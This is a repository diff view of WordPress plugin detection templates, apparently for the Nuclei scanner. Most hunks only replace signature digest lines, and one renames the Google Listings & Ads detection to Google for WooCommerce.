- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c99ce9c2661bdd54d56574864437371d73ab0e3428fa01c6c97b59f4967c5571022100adefcdc30c2ea9fc724bd55cd401ac2cac54da31c66a6220d55be63f65540162:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022068e59c0035d3c92eac3e53fb8bccd089e2ef8e409751d733b6aa9f493445179f022100bc52130b4aba52b9abbb507f6d3e38d206caa3ccde453b292b3086995e1f5e99:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203319cae360469622929a306469361144fb7009f1ec8dd83b0f2c4379d37f28d2022100aa505c450bde75b22e385ee558457c15e2a6b76f9411e9c1c9fab8f7ab057081:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aad2510bd151347032697d590682148f6658eb33922225cead84a0c15d1dbe6b02204a27be731170c7a3c1fbd71f672f9345022caaf8bb0a570ed88477f41ebe611c:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a496713fca262e4114aa39459f8d553dde5950316e7bba69b3cc4c620faadfdf0220206948c12de5016492989f912f1c7bdda92ac1c382d195d4ef4b71278bb4062d:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022004060c2f261be85351b8193a3a43fd42342b024bc89aa7e2009956b8022f4624022032df190f49c0657edb79e98c39f63ca750cae5dae460dfc35c8628f2610b3fcb:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100acb053fe0a5bfb3aabcd385031058e4b026062054f7be3a2738de05c99fd8cc702210083c1906b99db11b71208f89de95811f00e1f5605d11dfaed947b338b72408fe2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502204d82ad204ba61bb7164eeb5fa952765bf807868964de02e4a9ab7dc983e53bef022100ce9689aefce36b88f8e67d7c8c0aacf0863c7c68e2f4d7ecf2f2d5744b7ff2aa:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220706cafe45eb4aafb06ccd9303881494059a06ba5475496cca5464505fd1f57f5022003579197521eaf3e883b42b82cbc71de9317d459db82a1e999fee877229937a8:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100dd0171e3e288ea767ed340ca8252d7f7c818ffcc658327b47557d4431cd519aa022100866ede0cb789962656f0df49e2ba1039061cdb86dfbf49cb32ce3c2dea8a81fb:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100928cc763b02f807158b7e3774309ded6bc41cee14f18e816d5aa7971d72303aa0221008efd26b1804b4e3a554830db5f5258ac20ee5a7fca4f699de709c9d06eb6e76c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100dbfeffe12d3f9b7ca85f90ed53ab0349cb98788ae33a7ccd359c0cabfa889937022016725322eed4c545d8ee64c33677227d98c42a634240c4672cd6166fd4e5a464:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220362d55eacd4e0529ccbcd5c2cc6409c896fbcbe11098945c7a7effa5942ece34022100ea08980ed018f320b620f6a38a225db823f964221f68d98345406d6212596a89:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221008d2f89e74851e58ad68f44fbc00705839b30857b79a677ff8c7a9937a2c64f88022100aafb996dcdd048384f32c57de2f1a8235887ca8b33fc54ea68f9682073f200e4:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221008e2103855103fa095a6a057a621f43f85536b8711147339f17b8a8166d6b704b0220173a7844f0a3b8f36a51940aec38b4f7f9db0e8cdc517786bdba50a446442840:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fcf3db9cbeb1730a802e1802a57c54eafc4e2fba0cbd812190964a335a6fe7a00220468ef4049eae008d783b7b67dfbff39a669f58a9abc24aa2aa6db249b5109f76:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100bb5b9bf4cddc55618adc2637ef5bab88dd83ed99f9c241cf947df4baf73ff4de02210088084bd1099c88dc0d1ecdae1b879ee7ddc22cd559a39ed6a0b6592e487f11a8:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100fecea6afbc40fd74001395896acf1b30b19f856d8ff9c0aba27d90eed6bbc8c5022100bf215c242a5e18bea1730661e86fee7d576fa150feebab75506ab63070e13e99:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e160202a9722fcc926977cde9aec31160b512981d9104f157c15844394c211b5022036c9664ae6bb1f496f8f19744ff9a3f22641aaac7a9f24f1527818e0cf00f74e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220314a4c8ecc934abb59e2eb470b3be784ae64fe7b6403f95130c4821a58cd3504022100e692853b3c1669ed8d42c712997a1466c04d7b1e646866569b2867c08547c3ea:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f30a511bb4cb04fc0d2904238befde7f653d65db079c31038586a084059953b3022001424a080669776cd9b03feddfc4d1d2029642a01b61d97b5845e2d01359ba50:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450221008e0dfb1128d1cda1207be0c50a778abc43ebe5e6c085581c43d50e76ca63da6c02203a3c4bbe9dc45f0bdae3f6fb18d8b0dfd70c8793fee098a06d30c6d9e9b69ced:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206a2b8804e1cd5e7e40a434cfad3563d07e88e23891b307e90565da0c8ab4557a02207054488675272bd7d60e9dcab6bdf45610e6d1bc5955611d4ef802ec81c4ec3d:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402201513d0ee12dbb91822e10d3db8be7e387227f8a74514b942454d7263c0af067102202e7de7aee2ce00b92a97d62cc18371d473d88e62131d4c88d59e071a875104e0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220756ba6b0e0f30dbeb081bf7c46eeeb63ebb1c2c315075eed2f5ee63b08d0b072022100f50d24aeb7f09b5ac704a3f9ceded626e91d40be83d746eff7a486858c08de8f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450221008aadaf04995cde392c0c04d8a98c22ddd393fbb9d2e8a23a7f8bdf9d9e37735c02203d0950232ab17b87e9513a5298435eb3075dfda62eacbd92e180a3eca7340bd7:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022011f85a18447ff448d109a0433febb9f8727ded57766fd8ba80d31b6058e1a350022008759eafea04b10896bb4355555670f1d2272cb38da91efb2259d3bd2eb45eac:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450221009c1dd3fa78b85d538e1b5951ff23725442e0b63d779abeae89809ddccb55355502204280df661d93c01f1617cea9616e35791a8729bf4447c53fbf3a1bd2a85117d8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009a23998cc90decc40981cb31cc864550865e6251a2c3b85f039db19961500120022028dbcd170f15a83a85d19ee42fd87da5169a495f2ea5b70464299de56929d13e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e133684f432712e81c8570016efc2ad1fc2654b91aaafb25aaba244e134f17b002203c15cbaf49d1f0cdcb5a24de66cd7be429b7c87d23f8cc276970dff5e06368a7:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ce7607354ffbd0c6edf64b9f09bc3b5e170bc5eba7d64a2531dae81c8435c844022100b50b2eddded8c1ece094c98530e583ad4fcfdf4c80924f376740919d5a568741:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220525904ddb0b069e2164b263ab6601ca85721f5469b28b022b87f2303e9f2e0ee022100888e35d8de626bf523638a6ed01b830aac3b88c4f746b96ef89a501ba97256cf:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f1b42628d60cdb8d761ec22ebc34e1266b2e288637d1408d355608942596727a022016b994ba1d89d06f67aca3d67448816f5295c5e1388555e74a9fdb9ce8e9ddd5:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100a762ee27dc941b7bb17a5d4a2ba520c5c9745a505cc658e0e1f0e8b8c98ee637022100f72e12f184fde733c4f8319e399d99e86824f318e09e8ddd33af22e63669fb76:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008f2710add8dc7ba07d9bcd4054db30f6800216725d5ce413c6e89449a0b11e6b022100d362cb55b6719c7183710d999331ce302beacbe382becc20a25a761dc1877964:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100eee3ee1a4c6c4a3cf2a727f2724e7d91b3dd28d8b85b53effbb5d7a490016fb4022100ef30bd5f1d04f4c61449dc06fae53ed2b27b524f1b02ec96b7ef0714fafe3593:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402200ee1025c95b5a716ddd952fb681405b4bb79f4c49062e84a80a29a005a53fb8f02200807465c86930997a8f42de5696742add674c864bad2814690688a82d8390c3f:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022035e23b0fcb1eae118b330b06f27f922295127203d327787730576b4398b1181c02202219f15393df4092804e23ff98e3b312e80c21b947b44eb2c8fdbb7a3db08e40:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100950a254061a9f4333ed1d6b4cde994fe094b918a43e796a4b44236cbdb15ff01022100dfcae8f7a976cd502d31d6119783f695aac6e004a679c221a7d174bfe8fbfa9a:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022069d185e708d79f2539b188d366ec68f069ff6e6c8d5ff11e2a04616684d3e5a80220593e20f63e0793e09867a641413ad56b11b2f5d6d741040ffb73e359cba1af16:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100aa07b543553bcbf298cd20833dac22d3309ade0e5f582cf3ca443de8bc4f3499022100c6aec46e5e4390780bf50b576646b05da18121407bd138878a232f448928bdfc:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220490a32ba460eaeffc2c2b37be79a1b25376cba2fd18816c4d2c2317efde5f59102204d2b1c8633455a478c1952a05534088091e5240afad4cb7405afea0e23d0e13f:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100da919fa1a860ce5e7293971adad434fbe43caad3ed1ee5b3f7de49780108aefc022100b56e41b80436f0e0209f54fc1d249904476aaa362c248ab60607d1fa0a38a51e:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022017371035f143b0d21f58a8521a5ac68a21c7d0e428f850db6c2945cce6224de402201f7d1ba518620b4817fb38ac790bbbd55180923a9c35de784021db5d3081b47c:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022003e7bb755e61bf228a1a866d8c4c9478623c53f93511aa7cd74addd85104e83b02206438794ba370a44f90e0470f0bf889b02dc0156c3f95cc5403f6008e1aec4fa0:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402203f77bb6cc0af4f7f1f3517efcd0a60007848147e6b23275783309180c15e4fec022038dcb32a271f20c5e6150edeff22bce776454a45fa962c272a0197277c1a2969:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009aeed5e82d2edca95813538ef1e6d2dfb4484d45f0e97075dfcbc7aedff8cac2022100a918d568502a8403d0c22f8d995e578940e42d74a396924de9e6f60737729e9f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201cbb4ab1ecb6d7772754e15aacdc5f5ac93562c240b6df7d2ab7d0e1a64678700221008638722958a574199b188b58d737f920d0b325ac90c2bf9638f8725b422814b8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220118669fd621d8bc6045fd32d2c5dd90a4d0c427fa19e3db2c4686bd3d8c3d149022005f7269c1de6320915f40dd85b4f9f3e87c9125b62d3b473b53b8092c91992db:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402202245e20826ceb1bc1861146581bcf03e0adb1db7e38204dc5ef2817ed06cf2e102207541942da845963a9f08245a025b2121354291deb1c602b6f3808ab261bcb757:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100cbed62875d3692e3f3e9705bb48c8eab5bf6f28ba462607a07365e2a4050048c022100aa2d0905eabc20d45736a849fbcdd3e9e54f38f729901b6bf8fb5bd97ef4a19c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d37d9705c5e7a9f0b935cbdc2bafea0d5bfabd99fef4bf264fdbc3496f91f8720220319ccdc96c979eb145e36d9090e9f12a5957f9856b45c3d93a264371cbb1890a:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022050b192331ce5e822e33402dd92a8002f9d5962fc086058a482215fa8ec31adb502203779749438d08de3122ca1acf91eaa6b5d71e616315d9b82bca9ec8f9f89d96d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c7428bfa2e3519bbe94bf1dadea21b13d5093f051577b764f0a78c6cdfdc64bc022029632e972c84ed40b61bf9a22b083a68d0de72b9ae9130d6464cbcb232cf1b91:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022052ab1b165373a65038ba5d21657088bc61190c4dbd633b787bafe14872a5be520220209de48da1e61227320ae2e450142291bd5c24f1caf36d0ebfbca616f1af8e46:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502204666dc86947420231526c0be85ed8cf94c957606d0b0ae1d41d99b1d7f8ced03022100eaa48f848689386b7bfa1ed8cb3abfbb81e48c3005581f795bcdc9dae1f80497:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a7c325ec42e7b460db367853d16a7b89f71bc6c2cb726da19e69406f9aee847e022038e88ff320bf24e13702b3b6e14b627444a12cd16200b232e39fb2d14f1dabf1:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e64f356d8b4640ea1cccee85fb837660979b49118c86e3f1bf79e68a6d39479202200edfc794060a5af67e27caeac27cf56da4dae907b3e55857dee5a84440cbf3ac:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e340f466e81bcb1d29bc2aa4e9905cf3fa94a0eac98b175de5182a6f7c580075022100fce1c938bc50f3ec87cbc1b83eb32870f10e5cd6fc08da91eeab1f26ab1ff72e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aedce5a99fed63f397b2ceebae837fa610706cb1abbf460cfa4cf2865ebe10ce02201f2c4fd063f65c9d968cb89e2449a5e4a6ab338b355194c8e743dc65e2eae1fc:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220726dfeb1b9aec239a8781a91130662a6c9bbe0b1d2ec6895f08dcf00cd65b38c02206f92900b2194d1b5d6306ec2c9e9762ca10f8ea9032c94a274dd0cf79a163944:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e5cc7645ee5779d9c9baac100226bebcb0e0e3b46eb025f82d6bc33a6b132eba022100cc4710d8af997bb46c026d6b03dd99e54fdae08a13675aec1f00a1e8a9d99fa7:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022034c2b56e637f1e917bb28d7161e1697868aa593e5017976991b41b969a8cc55d022043852cf78532243a98502e7afee264a060823b43cf007857a07437932fd2328b:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022045028387d51452d9dd292f0cd89d3988a90b512581b0cb41687f6b6c63e1762202204768bb891142158bfc9694e2f89df4803548dcaf851839e94e11751404568af1:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022067410e737af5cf30a97c4ee1b8a6c9399f0db4d0ca0584a0cc16916cf451e8cf02201faa8fa9a10711df21ff5a3e0f4bc06682054d79579a642f762101ef3ebe1d62:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220141b3c44c36dec18cd5cf8ff0923ffb4fd0a0ce1ef846441be825fa92ff0887c02206d33bf3312fa4f2a21ff04fb35d8adcff41f5f3b4ea85331683db03c70171cd4:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e2ca75c7396c42a435468465ca5f9c862c8f1119b610c19667bb783fa8929b5c022100cf2337b16d63e5a437490f7772b0a9c9a01e9404b0dd0407c6e96e0cea983431:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c6d0c781dadc38999555235fe560eace14eed131d3a39a0086b367de14aef9da02206648d71b8b69d6ebd3c6ee46f67086951d0d4dab6ea60ec9932e2aba44add4a6:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022079e14c32b1b1dcdc5c8dcb9569dca76ee1835a97bf30a7a394eb1ab8b98cf7ec022100a3cf28e73ae7ca74e43f166f322d0ad73f94b0618cbacc75347b579baec72cac:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022000be16170ed47e29b8b7366b7cb1eac8bd10d1c7b87394712bf2c1d714236de002210094e56d61343fe454915065b8d3c11c859b0808b07e7aff9d181b2dd727749dfd:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207af2d3226ebe74556cfdb256f7a8114f7f2876394b303d235fd7fd914fc8983502205643add2a051fb0cb856cf215fa8dca28eecd90383c03148d33ef08c00e73f90:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201813910139681312b8aca80f92c4a94c9b60c1409da31c74b3e256cc4e831518022100f8bcd4057019dbc4af581e4b94a739e8402eabde3c5bb683f2c46211a9349d85:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022024506a35e4a3879be770e15d99b3177cead88fdf829b79791dd6cccfb62947d5022100fb9c6bb1f2fe1da117e6f85796d0f533214d9e206521b822033188cf325ca9c3:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450221008422069f96e979ba2445298b6e4d0fd7652953c80ffe82be1713fdd4512e26fa0220639c5c21f7c92a2c58392a1cac76c0d9070e72591cd5197d672c3674148f7a07:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022001351879f35ffbfc616588ba613f89fe1c29cdd3b7c15fa1e2ea72c54a24643d02202cb7ae5dae42c0b5df3123d7434b21e3de3e119aada7ccc4fceadde9bb210dca:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205755bab67c356c5c3b37a9a1ded30dd01f395bde3c6a0fc2a23061a42da2b081022100adb1ee4aa603f7a652c7e28dd9da2d459ec27cfc3204c90cf00f6b68008193fa:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205853bfafab9bc4ce91db030acbc31bc432172c03ec7724a027319325b4903e8802207c34979e24a8e94ab7bd37594da35c8bb1fee8f8d631afb7947e2ad91e66d787:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022004400237aa2306ef2d33235812b3d8211caeb87f4e4fffa1283ed828788cbf4f022100e6647e859243a8796f87487a31ead050d7881e03a4d3309c5a3e70135950e0f0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a721fd9533d038a6f2cdcc70cb90b4ef5284c9051866fb9f2bda451d27079bdb022100a1974f14bf5112214149d1a3aead9f9e1943367d19ed377a509f3bf916007c1b:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100a8b8836654e1f904e8571679d41c4381d7db8f2187f414488f90178a4cb3ccba0220127874a8427042394c9ad32bf2f2378cef5a6323407b581ec4807fe8313380a8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022025b1b79c11d9c1d05ebebcad7adf413510695b8059975da36d9801f9f815cd3702205c0c54a7309e9c4e359af0b4823e0dbc9b6dc2d57d4e6f06cd80fad5f10208df:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502206563f74fdc7289aa01f33e1e4e13d5b9b04fb9c354ba7ccca462f66583784e000221008a617378cffe449d7f34140cadac89ebe0576d362a7057476bab5f76d600f79c:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c63a8fe7182517e45a40ee901e5f0d075881df55786afa73b2060d4874c8917002204843b014cafede43460ab142e2b774a82ca06d41891b4927bf29a0a5f009d682:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502210089a7cf594ac15b59203112e1079f7e5d79e734dd29b7bb4d64c73038ceafe9cf0220667227832e0c8ac451c07a99420662f9f7987a63221fdb586b3882eeae13aaa2:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220598a4b568a391728619b731cb348216873a586ad30dbaf54195a741154f1d1ac022100d03389b3c000e3c112e112861bcc9f9df0b35b2a10b7b50815ef0b43c94b9ad8:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502203335336ce82488c544e4a3526ed55285b78dec6140a374491b9d240c9d21560b022100bd9ff8844226c8dcc0b90d0380075d8c831783c5b5ac3ce919036023e29b6f33:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210087f605093b6a11a128e16f4ed25eab0a7a03b68fbb846132f6766cb35774519402200877160a9cf7d0abd9953b634c945859508bd6ca830a7b1eb6eff439a9e33a84:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100c5cd0aee0d0ad42173e5efb8bcb9404ff4f2bc6ee08376ed44554a283f39fd0e022100a815d633e41e4bcde4f58128414cb6a5e7e64f69edcc6b40a39a10dee9ca7489:922c64590222798bb761d5b6d8e72950

View File

@ -1,7 +1,7 @@
id: wordpress-google-listings-and-ads id: wordpress-google-listings-and-ads
info: info:
name: Google Listings & Ads Detection name: Google for WooCommerce Detection
author: ricardomaia author: ricardomaia
severity: info severity: info
reference: reference:
@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009004c80984e3f18d57a940ede6d5aee63fef3a352398452a0b127a4e458e7a3f022100e37f1f4ed4a88c06927810f8459b6d98b4c42b469d1e321fd0ca7918df62b0ab:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210092a5a5b3a65d200cbaef3172dd567246fd693054723fdaa164edfda3e13a3420022100fd6d0af8ddea1d8b8355788ce2b4c3e86dc0a1b25e7d06799700add87b6c8f08:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100833ff19b9930d0f8c9f206e50843dff7862a23d814f2577f3b09d3084a7ee70a02207bf5566f22d1ae0516df07e88eb47d4d4d22b3b2a0af1d320b355ac68970397b:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502200215bff7e2dfaf0ca23d8ce30bba181b7b3e15615657381ead57d5abe45760ff022100b845aec40f2cb0539fa1854baf568437a0befe0f371e4482ad10bfb9dd8aebb7:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
